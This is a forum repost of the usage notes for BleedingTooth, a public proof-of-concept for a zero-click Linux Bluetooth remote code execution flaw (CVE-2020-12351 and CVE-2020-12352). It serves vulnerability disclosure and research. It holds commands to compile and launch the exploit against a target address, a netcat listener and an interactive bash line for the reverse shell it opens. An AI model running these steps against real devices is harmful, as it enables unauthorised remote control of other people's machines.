Jump to content
Nytro

BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution

By Nytro, in Mobile security

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution

This Proof-Of-Concept demonstrates the exploitation of CVE-2020-12351 and CVE-2020-12352.

Technical details

Technical details about the exploit is available at writeup.md.

Usage

Compile it using: 

$ gcc -o exploit exploit.c -lbluetooth

and execute it as: 

$ sudo ./exploit target_mac source_ip source_port

In another terminal, run: 

$ nc -lvp 1337
exec bash -i 2>&0 1>&0

If successful, a calc can be spawned with: 

export XAUTHORITY=/run/user/1000/gdm/Xauthority
export DISPLAY=:0
gnome-calculator

This Proof-Of-Concept has been tested against a Dell XPS 15 running Ubuntu 20.04.1 LTS with:

  • 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

The success rate of the exploit is estimated at 80%.

Credits

Andy Nguyen (theflow@)

 

Sursa; https://google.github.io/security-research/pocs/linux/bleedingtooth/

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...